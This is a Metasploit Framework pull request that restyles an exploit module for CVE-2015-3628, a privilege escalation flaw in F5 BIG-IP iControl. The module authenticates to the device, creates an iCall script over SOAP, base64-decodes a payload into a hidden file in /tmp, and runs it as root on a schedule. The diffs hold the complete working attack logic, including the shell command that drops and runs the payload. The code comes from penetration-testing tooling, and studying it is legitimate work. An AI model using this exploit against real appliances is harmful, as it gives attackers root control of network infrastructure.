### PR TITLE
Code/style cleanup for F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

### DIFF
--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -8,76 +8,77 @@ require 'nokogiri'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
-
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "F5 iControl iCall::Script Root Command Execution",
-      'Description'    => %q{
-        This module exploits an authenticated a privilege escalation vulnerability
-        in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
-        credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
-        (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'tom' # Discovery, Metasploit module
-        ],
-      'References'     =>
-        [
-          ['CVE', '2015-3628'],
-          ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
-          ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
-        ],
-      'Platform'       => ['unix'],
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
-          ['F5 BIG-IP LTM 11.x', {}]
-        ],
-      'Privileged'     => true,
-      'DisclosureDate' => "Sep 3 2015",
-      'DefaultTarget'  => 0))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "F5 iControl iCall::Script Root Command Execution",
+        'Description'    => %q{
+          This module exploits an authenticated a privilege escalation vulnerability
+          in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
+          credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
+          (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'tom' # Discovery, Metasploit module
+          ],
+        'References'     =>
+          [
+            ['CVE', '2015-3628'],
+            ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
+            ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
+          ],
+        'Platform'       => ['unix'],
+        'Arch'           => ARCH_CMD,
+        'Targets'        =>
+          [
+            ['F5 BIG-IP LTM 11.x', {}]
+          ],
+        'Privileged'     => true,
+        'DisclosureDate' => "Sep 3 2015",
+        'DefaultTarget'  => 0))
 
-      register_options(
-        [
-          Opt::RPORT(443),
-          OptBool.new('SSL', [true, 'Use SSL', true]),
-          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
-          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
-          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
-        ], self.class)
-      register_advanced_options(
-        [
-          OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
-          OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
-          OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
-          OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
-        ], self.class)
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+      ])
+    register_advanced_options(
+      [
+        OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
+        OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
+        OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
+        OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
+      ])
   end
 
   def xml_add_namespaces(xml)
-      ns = xml.doc.root.add_namespace_definition("soapenv","http://schemas.xmlsoap.org/soap/envelope/")
-      xml.doc.root.namespace = ns
-      xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
-      xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
-      xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
-      xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
-      xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
-      return xml
+    ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
+    xml.doc.root.namespace = ns
+    xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
+    xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
+    xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
+    xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
+    xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
+    xml
   end
 
   def send_soap_request(pay)
-      res = send_request_cgi({
+    res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'data' => pay,
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
-    })
+    )
     if res && res.code == 200
       return res
     elsif res
@@ -89,23 +90,24 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_error('No response')
     end
-    return false
+    false
   end
 
   # cmd is valid tcl script
   def create_script(cmd)
     scriptname = Rex::Text.rand_text_alpha_lower(5)
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
         xml['soapenv'].Body do
           xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            xml.scripts('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.scripts(string_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item scriptname
             end
-            xml.definitions('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            xml.definitions(string_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item cmd
             end
@@ -113,22 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    if send_soap_request(pay)
-      return scriptname
-    else
-      return false
-    end
+    send_soap_request(builder.to_xml) ? scriptname : false
   end
 
   def delete_script(scriptname)
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
         xml['soapenv'].Body do
           xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            xml.scripts('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.scripts(string_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item scriptname
             end
@@ -136,12 +134,11 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    return send_soap_request(pay)
+    send_soap_request(builder.to_xml)
   end
 
   def script_exists(scriptname)
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
@@ -150,32 +147,29 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    res = send_soap_request(pay)
-    if res && res.code == 200 && res.body =~ /\/Common\/#{scriptname}/
-      return true
-    else
-      return false
-    end
+    res = send_soap_request(builder.to_xml)
+    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
   end
 
   def create_handler(scriptname, interval)
     handler_name = Rex::Text.rand_text_alpha_lower(5)
-    xml = Nokogiri::XML::Builder.new do |xml|
-    xml.Envelope do
-      xml = xml_add_namespaces(xml)
-      xml['soapenv'].Header
+    builder = Nokogiri::XML::Builder.new do |xml|
+      xml.Envelope do
+        xml = xml_add_namespaces(xml)
+        xml['soapenv'].Header
         xml['soapenv'].Body do
           xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            xml.handlers('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.handlers(string_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item handler_name
             end
-              xml.scripts('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            xml.scripts(string_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item scriptname
             end
-            xml.intervals('xsi:type'=>'urn:Common.ULongSequence', 'soapenc:arrayType'=>'xsd:long[]', 'xmlns:urn'=>'urn:iControl') do
+            long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.intervals(long_attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item interval
             end
@@ -183,22 +177,18 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    if send_soap_request(pay)
-      return handler_name
-    else
-      return false
-    end
+    send_soap_request(builder.to_xml) ? handler_name : false
   end
 
   def delete_handler(handler_name)
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
         xml['soapenv'].Body do
           xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            xml.handlers('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.handlers(attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item handler_name
             end
@@ -206,13 +196,12 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
 
-    return send_soap_request(pay)
+    send_soap_request(builder.to_xml)
   end
 
   def handler_exists(handler_name)
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
@@ -221,13 +210,8 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    res = send_soap_request(pay)
-    if res && res.code == 200 && res.body =~ /\/Common\/#{handler_name}/
-      return true
-    else
-      return false
-    end
+    res = send_soap_request(builder.to_xml)
+    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
   end
 
   def check
@@ -236,17 +220,18 @@ class Metasploit3 < Msf::Exploit::Remote
     # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
     # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
     # any other response is considered not vulnerable
-    xml = Nokogiri::XML::Builder.new do |xml|
+    builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
         xml = xml_add_namespaces(xml)
         xml['soapenv'].Header
         xml['soapenv'].Body do
           xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            xml.scripts('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+            xml.scripts(attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item ""
             end
-            xml.definitions('xsi:type'=>'urn:Common.StringSequence', 'soapenc:arrayType'=>'xsd:string[]', 'xmlns:urn'=>'urn:iControl') do
+            xml.definitions(attrs) do
               xml.parent.namespace = xml.parent.parent.namespace_definitions.first
               xml.item ""
             end
@@ -254,46 +239,43 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    pay = xml.to_xml
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'data' => pay,
+      'data' => builder.to_xml,
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
-    })
+    )
     if res && res.code == 500 && res.body =~ /path is empty/
       return Exploit::CheckCode::Appears
     elsif res && res.code == 401
-        print_error('401 Unauthorized')
-        return Exploit::CheckCode::Unknown
+      print_error('401 Unauthorized')
+      return Exploit::CheckCode::Unknown
     else
       return Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-
     # phase 1: create iCall script to create file with payload, execute it and remove it.
     filepath = datastore['PATH']
     filename = datastore['FILENAME']
     dest_file = filepath + '/' + filename
-    #register_file_for_cleanup dest_file
+    register_file_for_cleanup dest_file
 
-    shell_cmd = %Q@echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file}; chmod +x #{dest_file};#{dest_file};rm -f #{dest_file}@
-    cmd = %Q@if { ! [file exists #{dest_file}]} { exec /bin/sh -c "#{shell_cmd}"}@
+    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file}; chmod +x #{dest_file};#{dest_file};rm -f #{dest_file})
+    cmd = %(if { ! [file exists #{dest_file}]} { exec /bin/sh -c "#{shell_cmd}"})
 
     arg_max = datastore['ARG_MAX']
     if shell_cmd.size > arg_max
-      print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
+      print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
+        "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
       return false
     end
 
-    scriptname = Rex::Text.rand_text_alpha_lower(5)
     print_status('Uploading payload...')
 
-    script = create_script(cmd)
-    unless script
+    unless (script = create_script(cmd))
       print_error("Upload script failed")
       return false
     end
@@ -312,13 +294,12 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     print_status('Wait until payload is executed...')
 
-    sleep(interval+2) # small delay, just to make sure
+    sleep(interval) # small delay, just to make sure
     print_status('Trying cleanup...')
-    unless delete_handler(handler) && delete_script(script)
-      print_error('Error while cleaning up')
-    else
+    if delete_handler(handler) && delete_script(script)
       print_status('Cleanup finished with no errors')
+    else
+      print_error('Error while cleaning up')
     end
-
   end
 end

--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -78,16 +78,18 @@ class Metasploit3 < Msf::Exploit::Remote
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     })
-    if res and res.code == 200
+    if res && res.code == 200
       return res
-    else
-      if res and res.code == 401
+    elsif res
+      if res.code == 401
         print_error('401 Unauthorized - Check credentials')
       else
         print_error("#{res.code} - Unknown error")
       end
-      return false
+    else
+      vprint_error('No response')
     end
+    return false
   end
 
   # cmd is valid tcl script
@@ -150,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     pay = xml.to_xml
     res = send_soap_request(pay)
-    if res and res.code == 200 and res.body =~ /\/Common\/#{scriptname}/
+    if res && res.code == 200 && res.body =~ /\/Common\/#{scriptname}/
       return true
     else
       return false
@@ -221,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     pay = xml.to_xml
     res = send_soap_request(pay)
-    if res and res.code == 200 and res.body =~ /\/Common\/#{handler_name}/
+    if res && res.code == 200 && res.body =~ /\/Common\/#{handler_name}/
       return true
     else
       return false
@@ -260,9 +262,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     })
-    if res and res.code == 500 and res.body =~ /path is empty/
+    if res && res.code == 500 && res.body =~ /path is empty/
       return Exploit::CheckCode::Appears
-    elsif res and res.code == 401
+    elsif res && res.code == 401
         print_error('401 Unauthorized')
         return Exploit::CheckCode::Unknown
     else
@@ -312,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sleep(interval+2) # small delay, just to make sure
     print_status('Trying cleanup...')
-    unless delete_handler(handler) and delete_script(script)
+    unless delete_handler(handler) && delete_script(script)
       print_error('Error while cleaning up')
     else
       print_status('Cleanup finished with no errors')

--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -60,6 +60,19 @@ class Metasploit3 < Msf::Exploit::Remote
       ])
   end
 
+  def build_xml
+    builder = Nokogiri::XML::Builder.new do |xml|
+      xml.Envelope do
+        xml = xml_add_namespaces(xml)
+        xml['soapenv'].Header
+        xml['soapenv'].Body do
+          yield xml
+        end
+      end
+    end
+    builder.to_xml
+  end
+
   def xml_add_namespaces(xml)
     ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
     xml.doc.root.namespace = ns
@@ -96,121 +109,85 @@ class Metasploit3 < Msf::Exploit::Remote
   # cmd is valid tcl script
   def create_script(cmd)
     scriptname = Rex::Text.rand_text_alpha_lower(5)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-            xml.definitions(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item cmd
-            end
-          end
+    create_xml = build_xml do |xml|
+      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
+        end
+        xml.definitions(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item cmd
         end
       end
     end
-    send_soap_request(builder.to_xml) ? scriptname : false
+    send_soap_request(create_xml) ? scriptname : false
   end
 
   def delete_script(scriptname)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-          end
+    delete_xml = build_xml do |xml|
+      xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
         end
       end
     end
-    send_soap_request(builder.to_xml)
+    send_soap_request(delete_xml)
   end
 
   def script_exists(scriptname)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
-        end
-      end
+    exists_xml = build_xml do |xml|
+      xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
     end
-    res = send_soap_request(builder.to_xml)
+    res = send_soap_request(exists_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
   end
 
   def create_handler(scriptname, interval)
     handler_name = Rex::Text.rand_text_alpha_lower(5)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.handlers(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item handler_name
-            end
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-            long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.intervals(long_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item interval
-            end
-          end
+    handler_xml = build_xml do |xml|
+      xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.handlers(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
+        end
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
+        end
+        long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.intervals(long_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item interval
         end
       end
     end
-    send_soap_request(builder.to_xml) ? handler_name : false
+    send_soap_request(handler_xml) ? handler_name : false
   end
 
   def delete_handler(handler_name)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.handlers(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item handler_name
-            end
-          end
+    delete_xml = build_xml do |xml|
+      xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.handlers(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
         end
       end
     end
 
-    send_soap_request(builder.to_xml)
+    send_soap_request(delete_xml)
   end
 
   def handler_exists(handler_name)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
-        end
-      end
+    handler_xml = build_xml do |xml|
+      xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
     end
-    res = send_soap_request(builder.to_xml)
+    res = send_soap_request(handler_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
   end
 
@@ -220,29 +197,24 @@ class Metasploit3 < Msf::Exploit::Remote
     # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
     # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
     # any other response is considered not vulnerable
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item ""
-            end
-            xml.definitions(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item ""
-            end
-          end
+    check_xml = build_xml do |xml|
+      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item
+        end
+        xml.definitions(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item
         end
       end
     end
+
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'data' => builder.to_xml,
+      'data' => check_xml,
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     )


### PR DESCRIPTION
 The module looks pretty good as-is, I just did a bunch of style cleanup to appease rubocop and the style gods, but I also simplified things a bit with regards to building XML in the interest of keeping this simple.  I have an older but invulnerable/unaffected F5, so please test this.

re: https://github.com/rapid7/metasploit-framework/pull/6228